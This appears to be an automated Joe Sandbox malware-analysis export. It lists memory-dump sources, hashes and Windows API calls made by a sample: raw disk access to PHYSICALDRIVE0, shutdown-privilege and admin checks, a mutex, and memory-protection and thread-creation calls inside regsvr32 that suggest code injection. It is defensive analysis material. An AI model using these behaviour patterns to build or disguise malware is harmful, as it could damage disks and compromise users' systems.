• Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
• Instruction ID: c3339b175f8b132734afde4b87bcd326777cd273dbfa93b5593f16fc1374389e
• Opcode Fuzzy Hash: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
• Instruction Fuzzy Hash: 3DF0F876C0020CBFCF01AFA5D955C9DBFB9FF48200F0084AEB91466162D7369A20AB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
• DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ControlCreateDeviceFile
• String ID: \\.\C:$\\.\PHYSICALDRIVE0
• API String ID: 107608037-2160117148
• Opcode ID: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
• Instruction ID: 6179182b2b83b9443c5bd9d33f461fa1aeab268a59a3a7b7debce46551af33e6
• Opcode Fuzzy Hash: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
• Instruction Fuzzy Hash: AF216D38640348EFD718CF68ED45F99BBB4EB48701F10C1AAE905AB3E1D6B49B40CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
• DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ControlCreateDeviceFile
• String ID: \\.\C:$\\.\PHYSICALDRIVE0
• API String ID: 107608037-2160117148
• Opcode ID: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
• Instruction ID: 711083b2bbb86b7d36e7a7c78397dedf6b4307ebbdc5261e1e4f3fe33cb2826c
• Opcode Fuzzy Hash: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
• Instruction Fuzzy Hash: 6F215C38600308AFD718CF58DC46F99BBB4AB48701F10C0AAE905AB3E1D6B4AA40CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
• DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlCreateDeviceFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 107608037-2160117148
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 389e508c5a35674a8dec956cf5ed0ace9ff19c3110c7d277eeff61c57732489a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79216D78604348EFD708CF58E855BA9BBB4EB48711F10C1AAE905AB3E1D7B49B40CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 00404845
                                                                                                                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004082F8
                                                                                                                                                                                                                                                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 0040AA9C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a4effce1087fb57fd00f7ec72273620cf91c437d6a0f92fe25e66b5b43bbe758
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1502378442f3bba6843c10e462c5ea7b9d530f023e777048d123248eda5abe90
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4effce1087fb57fd00f7ec72273620cf91c437d6a0f92fe25e66b5b43bbe758
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9014470A04348FAEB10DBE4C948BEEBFB8AB15705F008499E101BA1C1D3B89B04DB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4278b43e27663415cba18f20cd4f792bdb1a65b806582fdca38cb5ba5a4c1545
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D515B75A04244DFEB08CF98C590BAABBB2EF94304F2881E9D9015B387C675EE41DB91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040AEB6,?,?,004046B5), ref: 0040D1FE
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040D336
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D3A8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: advapi32.dll$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2593893887-1356967432
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ca720bcfbdb204521244a6d16e88fbee784b87e4b750a5d7fd7297a05bd30f3d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC511DF2D10210EFD304BFA1BCC28393AB5E649305744457FF985A72A1F6B9A9448B6B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402404
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(NTDLL.DLL), ref: 004024D2
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID: NTDLL.DLL$SeShutdownPrivilege$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-2471717051
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3c0ce9a7761a6e63309c521fc4ca6a6d9466e377a545f21450368ef7aac56ae8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F13146B1E10209EBDB04DFE0CD46BEEBB74EB44701F20416AF501B66C0E7795A44CBA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlNtStatusToDosError.NTDLL(C0000023), ref: 004037E8
                                                                                                                                                                                                                                                                                                                                                                  • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 004037EF
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Error$EnvironmentExpandInitLastRestoreStatusStringStrings_UnicodeWin32
                                                                                                                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4202685462-1885708031
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2625ad76528c3a05819e41784e94355af3192e6a8ec1aace2841fc774e878e1c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5115175D14209EFDB14DFE4C984AAEBB79EF08301F10856AE915B32C0EB789705CB56
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,00600000), ref: 004050CC
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,explorer.exe), ref: 004050DE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InitStringUnicode
                                                                                                                                                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4228678080-3187896405
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 050ed0569a6514cfdb40d37d4b6a842c1993e2635d6f26a1999b978f90a0d4ff
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAF09074204248EFCB04CF54C880E6ABBA6FB49304F20855AFC0597381C674ED91CB9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,jmuZVxzUSQKZJ,?,?,004044C1,?,?,004046B5), ref: 00403AFB
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004044C1,?,?,004046B5), ref: 00403B06
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                                                                                  • String ID: jmuZVxzUSQKZJ
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1925916568-1615886713
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0594eaefbf50b0c8ed9c9a89b72dfe51cd43608961eacb7f94053228cce8ae52
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D017B044A304FAE3008F50DE4DB587EA4EB10702F208036E2026A2D4E3F85A45564A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:21.6%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:52
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:13

                                                                                                                                                                                                                                                                                                                                                                  Callgraph


                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04EB5A24
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04EB5ACB
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04EB5B4E
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04EB5B6E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444299072.0000000004EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04EB1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4eb1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2541858876-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 12afed25b5214265d0b16d22973800ec664d50b4f0a6e33e63a13b5b13dd3970
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0fe9f005e2ab875997f3c764cc75610e13683795a99c994bf93c58f034bf591a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12afed25b5214265d0b16d22973800ec664d50b4f0a6e33e63a13b5b13dd3970
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDF17376A053419FD725CF25C880ADBF7E7BFC8314F15C96EE5899B218DA30A8058B91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 04FE4B51
Memory Dump Source
• Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04FEF3AD
Memory Dump Source
• Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileMappingW.KERNELBASE(?,?,?,?,?,?), ref: 04FE177B
Memory Dump Source
• Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
Similarity
• API ID: CreateFileMapping
• String ID:
• API String ID: 524692379-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 04FEFA20
Memory Dump Source
• Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04FEE036
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 647da2b942333bcbcb27ca3ad03edced97bebc1f07ac82cd6b146165d75be7a8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 474b49beb19143bf274cd9de485110fd3a28da50494fb08a67cff7f0a16eb9b6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 647da2b942333bcbcb27ca3ad03edced97bebc1f07ac82cd6b146165d75be7a8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2A15A77A183418FC710CF29D48066AFBE2FFC8314F1A8959E8959B350D735E94ACB82
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

